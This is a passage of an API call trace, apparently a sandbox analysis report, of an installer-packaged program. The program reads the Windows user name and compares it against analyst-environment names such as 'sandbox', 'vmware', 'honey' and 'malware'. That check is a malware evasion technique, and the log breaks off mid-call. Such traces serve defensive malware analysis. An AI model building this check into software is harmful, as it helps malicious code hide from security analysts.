(lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.993] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.993] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.993] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.993] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.993] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.993] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.993] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.993] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.993] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.994] lstrcpynA (in: lpString1=0x3217a4, lpString2="advapi32::GetUserName(t .R0, *i 1024 R1) i.R2", iMaxLength=1024 | out: lpString1="advapi32::GetUserName(t .R0, *i 1024 R1) i.R2") returned="advapi32::GetUserName(t .R0, *i 1024 R1) i.R2" [0157.994] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.994] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.994] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.994] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.994] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.995] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.995] lstrcpyA (in: lpString1=0x321fb8, lpString2="advapi32" | out: lpString1="advapi32") returned="advapi32" [0157.995] lstrcpyA (in: lpString1=0x3223c8, lpString2="advapi32" | out: lpString1="advapi32") returned="advapi32" [0157.995] lstrcpyA (in: lpString1=0x3227c8, lpString2="GetUserName" | out: lpString1="GetUserName") returned="GetUserName" [0157.995] GetModuleHandleA (lpModuleName="advapi32") returned 0x76650000 [0157.995] GetProcAddress (hModule=0x76650000, lpProcName="GetUserName") returned 0x0 [0157.995] lstrlenA (lpString="GetUserName") returned 11 [0157.995] GetProcAddress (hModule=0x76650000, lpProcName="GetUserNameA") returned 0x7667a4b4 [0157.995] lstrcpynA (in: lpString1=0x3217a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.996] lstrcpynA (in: lpString1=0x321ba8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.996] lstrcpynA (in: lpString1=0x3217a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.996] GetUserNameA (in: lpBuffer=0x321ba8, pcbBuffer=0x2f17c0 | out: lpBuffer="aDU0VK IWA5kLS", pcbBuffer=0x2f17c0) returned 1 [0157.998] wsprintfA (in: param_1=0x3217a0, param_2="%d" | out: param_1="15") returned 2 [0157.998] lstrcpyA (in: lpString1=0x432c00, lpString2="15" | out: lpString1="15") returned="15" [0157.998] lstrcpynA (in: lpString1=0x3217a0, lpString2="aDU0VK IWA5kLS", iMaxLength=1024 | out: lpString1="aDU0VK IWA5kLS") returned="aDU0VK IWA5kLS" [0157.998] lstrcpyA (in: lpString1=0x432800, lpString2="aDU0VK IWA5kLS" | out: lpString1="aDU0VK IWA5kLS") returned="aDU0VK IWA5kLS" [0157.998] wsprintfA (in: param_1=0x3217a0, param_2="%d" | out: param_1="1") returned 1 [0157.998] lstrcpyA (in: lpString1=0x433000, lpString2="1" | out: lpString1="1") returned="1" [0157.998] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.998] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.998] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.998] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.998] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.999] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.999] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.999] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.999] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.999] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.999] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.999] lstrcpynA (in: lpString1=0x3250bc, lpString2="User32::CharLower(t R0 R0) i", iMaxLength=1024 | out: lpString1="User32::CharLower(t R0 R0) i") returned="User32::CharLower(t R0 R0) i" [0157.999] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.000] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0158.000] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.000] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.000] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.000] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.000] lstrcpyA (in: lpString1=0x3258d0, lpString2="User32" | out: lpString1="User32") returned="User32" [0158.000] lstrcpyA (in: lpString1=0x3217a8, lpString2="User32" | out: lpString1="User32") returned="User32" [0158.000] lstrcpyA (in: lpString1=0x321ba8, lpString2="CharLower" | out: lpString1="CharLower") returned="CharLower" [0158.000] GetModuleHandleA (lpModuleName="User32") returned 0x76780000 [0158.001] GetProcAddress (hModule=0x76780000, lpProcName="CharLower") returned 0x0 [0158.001] lstrlenA (lpString="CharLower") returned 9 [0158.001] GetProcAddress (hModule=0x76780000, lpProcName="CharLowerA") returned 0x767a3e75 [0158.001] lstrcpynA (in: lpString1=0x322c50, lpString2="aDU0VK IWA5kLS", iMaxLength=1024 | out: lpString1="aDU0VK IWA5kLS") returned="aDU0VK IWA5kLS" [0158.001] lstrcpynA (in: lpString1=0x323058, lpString2="aDU0VK IWA5kLS", iMaxLength=1024 | out: lpString1="aDU0VK IWA5kLS") returned="aDU0VK IWA5kLS" [0158.001] lstrcpynA (in: lpString1=0x322c50, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.001] lstrcpynA (in: lpString1=0x322c50, lpString2="adu0vk iwa5kls", iMaxLength=1024 | out: lpString1="adu0vk iwa5kls") returned="adu0vk iwa5kls" [0158.001] lstrcpyA (in: lpString1=0x432800, lpString2="adu0vk iwa5kls" | out: lpString1="adu0vk iwa5kls") returned="adu0vk iwa5kls" [0158.001] wsprintfA (in: param_1=0x322c50, param_2="%d" | out: param_1="3289176") returned 7 [0158.001] lstrcpynA (in: lpString1=0x42e3a0, lpString2="adu0vk iwa5kls", iMaxLength=1024 | out: lpString1="adu0vk iwa5kls") returned="adu0vk iwa5kls" [0158.001] lstrlenA (lpString="adu0vk iwa5kls") returned 14 [0158.001] lstrcpynA (in: lpString1=0x40ac18, lpString2="adu0vk iwa5kls", iMaxLength=1024 | out: lpString1="adu0vk iwa5kls") returned="adu0vk iwa5kls" [0158.001] lstrcpynA (in: lpString1=0x40b018, lpString2="sandbox", iMaxLength=1024 | out: lpString1="sandbox") returned="sandbox" [0158.001] lstrcmpiA (lpString1="adu0vk iwa5kls", lpString2="sandbox") returned -1 [0158.001] lstrcpynA (in: lpString1=0x42e3a0, lpString2="adu0vk iwa5kls", iMaxLength=1024 | out: lpString1="adu0vk iwa5kls") returned="adu0vk iwa5kls" [0158.001] lstrlenA (lpString="adu0vk iwa5kls") returned 14 [0158.002] lstrcpynA (in: lpString1=0x40ac18, lpString2="adu0vk iwa5kls", iMaxLength=1024 | out: lpString1="adu0vk iwa5kls") returned="adu0vk iwa5kls" [0158.002] lstrcpynA (in: lpString1=0x40b018, lpString2="vmware", iMaxLength=1024 | out: lpString1="vmware") returned="vmware" [0158.002] lstrcmpiA (lpString1="adu0vk iwa5kls", lpString2="vmware") returned -1 [0158.002] lstrcpynA (in: lpString1=0x42e3a0, lpString2="adu0vk iwa5kls", iMaxLength=1024 | out: lpString1="adu0vk iwa5kls") returned="adu0vk iwa5kls" [0158.002] lstrlenA (lpString="adu0vk iwa5kls") returned 14 [0158.002] lstrcpynA (in: lpString1=0x40ac18, lpString2="adu0vk iwa5kls", iMaxLength=1024 | out: lpString1="adu0vk iwa5kls") returned="adu0vk iwa5kls" [0158.002] lstrcpynA (in: lpString1=0x40b018, lpString2="honey", iMaxLength=1024 | out: lpString1="honey") returned="honey" [0158.002] lstrcmpiA (lpString1="adu0vk iwa5kls", lpString2="honey") returned -1 [0158.002] lstrcpynA (in: lpString1=0x42e3a0, lpString2="adu0vk iwa5kls", iMaxLength=1024 | out: lpString1="adu0vk iwa5kls") returned="adu0vk iwa5kls" [0158.002] lstrlenA (lpString="adu0vk iwa5kls") returned 14 [0158.002] lstrcpynA (in: lpString1=0x40ac18, lpString2="adu0vk iwa5kls", iMaxLength=1024 | out: lpString1="adu0vk iwa5kls") returned="adu0vk iwa5kls" [0158.002] lstrcpynA (in: lpString1=0x40b018, lpString2="nepenthes", iMaxLength=1024 | out: lpString1="nepenthes") returned="nepenthes" [0158.002] lstrcmpiA (lpString1="adu0vk iwa5kls", lpString2="nepenthes") returned -1 [0158.002] lstrcpynA (in: lpString1=0x42e3a0, lpString2="adu0vk iwa5kls", iMaxLength=1024 | out: lpString1="adu0vk iwa5kls") returned="adu0vk iwa5kls" [0158.002] lstrlenA (lpString="adu0vk iwa5kls") returned 14 [0158.002] lstrcpynA (in: lpString1=0x40ac18, lpString2="adu0vk iwa5kls", iMaxLength=1024 | out: lpString1="adu0vk iwa5kls") returned="adu0vk iwa5kls" [0158.002] lstrcpynA (in: lpString1=0x40b018, lpString2="maltest", iMaxLength=1024 | out: lpString1="maltest") returned="maltest" [0158.002] lstrcmpiA (lpString1="adu0vk iwa5kls", lpString2="maltest") returned -1 [0158.002] lstrcpynA (in: lpString1=0x42e3a0, lpString2="adu0vk iwa5kls", iMaxLength=1024 | out: lpString1="adu0vk iwa5kls") returned="adu0vk iwa5kls" [0158.002] lstrlenA (lpString="adu0vk iwa5kls") returned 14 [0158.002] lstrcpynA (in: lpString1=0x40ac18, lpString2="adu0vk iwa5kls", iMaxLength=1024 | out: lpString1="adu0vk iwa5kls") returned="adu0vk iwa5kls" [0158.002] lstrcpynA (in: lpString1=0x40b018, lpString2="malware", iMaxLength=1024 | out: lpString1="malware") returned="malware" [0158.002] lstrcmpiA (lpString1="adu0vk iwa5kls", lpString2="malware") returned -1 [0158.002] lstrcpynA (in: lpString1=0x42e3a0, lpString2="adu0vk iwa5kls", iMaxLength=1024 | out: lpString1="adu0vk iwa5kls") returned="adu0vk iwa5kls" [0158.002] lstrlenA (lpString="adu0vk iwa5kls") returned 14 [0158.002] lstrcpynA (in: lpString1=0x40ac18, lpString2="adu0vk iwa5kls", iMaxLength=1024 | out: lpString1="adu0vk iwa5kls") returned="adu0vk iwa5kls" [0158.002] lstrcpynA (in: lpString1=0x40b018, lpString2="currentuser", iMaxLength=1024 | out: lpString1="currentuser") returned="currentuser" [0158.002] lstrcmpiA (lpString1="adu0vk iwa5kls", lpString2="currentuser") returned -1 [0158.002] lstrcpynA (in: lpString1=0x40a418, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0158.002] lstrlenA (lpString="FALSE") returned 5 [0158.002] lstrcpynA (in: lpString1=0x432800, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0158.002] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.003] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.003] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.003] lstrcpynA (in: lpString1=0x42e3a0, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0158.003] lstrlenA (lpString="FALSE") returned 5 [0158.003] lstrcpynA (in: lpString1=0x40ac18, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0158.003] lstrcpynA (in: lpString1=0x40b018, lpString2="TRUE", iMaxLength=1024 | out: lpString1="TRUE") returned="TRUE" [0158.003] lstrcmpiA (lpString1="FALSE", lpString2="TRUE") returned -1 [0158.003] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.003] lstrlenA (lpString="") returned 0 [0158.003] lstrcpynA (in: lpString1=0x31400c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.003] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.003] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0158.003] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.003] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.003] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.003] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.003] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0158.003] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.003] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.004] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0158.004] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0158.004] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::GetCurrentProcessId()i.R0", iMaxLength=1024 | out: lpString1="kernel32::GetCurrentProcessId()i.R0") returned="kernel32::GetCurrentProcessId()i.R0" [0158.004] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.004] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0158.004] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.004] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.004] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.005] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.005] lstrcpyA (in: lpString1=0x3250b8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.005] lstrcpyA (in: lpString1=0x3254c8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.005] lstrcpyA (in: lpString1=0x3258c8, lpString2="GetCurrentProcessId" | out: lpString1="GetCurrentProcessId") returned="GetCurrentProcessId" [0158.005] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0158.005] GetProcAddress (hModule=0x75c90000, lpProcName="GetCurrentProcessId") returned 0x75ca11f8 [0158.005] lstrcpynA (in: lpString1=0x3250b8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.005] GetCurrentProcessId () returned 0x4c8 [0158.005] wsprintfA (in: param_1=0x3250b8, param_2="%d" | out: param_1="1224") returned 4 [0158.005] lstrcpyA (in: lpString1=0x432800, lpString2="1224" | out: lpString1="1224") returned="1224" [0158.005] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.005] lstrlenA (lpString="1224") returned 4 [0158.006] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.006] lstrlenA (lpString="1224") returned 4 [0158.006] lstrcpynA (in: lpString1=0x31441c, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.006] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.006] lstrlenA (lpString="") returned 0 [0158.006] lstrcpynA (in: lpString1=0x31482c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.006] lstrcpynA (in: lpString1=0x40a418, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.006] lstrcpynA (in: lpString1=0x31441c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.006] lstrcpynA (in: lpString1=0x31482c, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.006] lstrcpynA (in: lpString1=0x430000, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.006] lstrcpynA (in: lpString1=0x42e3a0, lpString2="384", iMaxLength=1024 | out: lpString1="384") returned="384" [0158.006] lstrlenA (lpString="384") returned 3 [0158.006] lstrcpynA (in: lpString1=0x31482c, lpString2="384", iMaxLength=1024 | out: lpString1="384") returned="384" [0158.006] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.006] lstrlenA (lpString="") returned 0 [0158.006] lstrcpynA (in: lpString1=0x3250bc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.006] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.006] lstrlenA (lpString="") returned 0 [0158.006] lstrcpynA (in: lpString1=0x3254cc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.006] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.006] lstrlenA (lpString="") returned 0 [0158.006] lstrcpynA (in: lpString1=0x3258dc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.006] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.007] lstrlenA (lpString="") returned 0 [0158.007] lstrcpynA (in: lpString1=0x325cec, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.007] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.007] lstrlenA (lpString="") returned 0 [0158.007] lstrcpynA (in: lpString1=0x3260fc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.007] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.007] lstrlenA (lpString="") returned 0 [0158.007] lstrcpynA (in: lpString1=0x32650c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.007] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.007] lstrlenA (lpString="1224") returned 4 [0158.007] lstrcpynA (in: lpString1=0x40a418, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.007] lstrlenA (lpString="1224") returned 4 [0158.007] lstrcpynA (in: lpString1=0x430400, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.007] lstrcpynA (in: lpString1=0x40a418, lpString2="65536", iMaxLength=1024 | out: lpString1="65536") returned="65536" [0158.007] lstrlenA (lpString="65536") returned 5 [0158.007] lstrcpynA (in: lpString1=0x430800, lpString2="65536", iMaxLength=1024 | out: lpString1="65536") returned="65536" [0158.007] lstrcpynA (in: lpString1=0x32691c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.007] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.007] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0158.007] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.007] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.008] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.008] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.008] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0158.008] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") 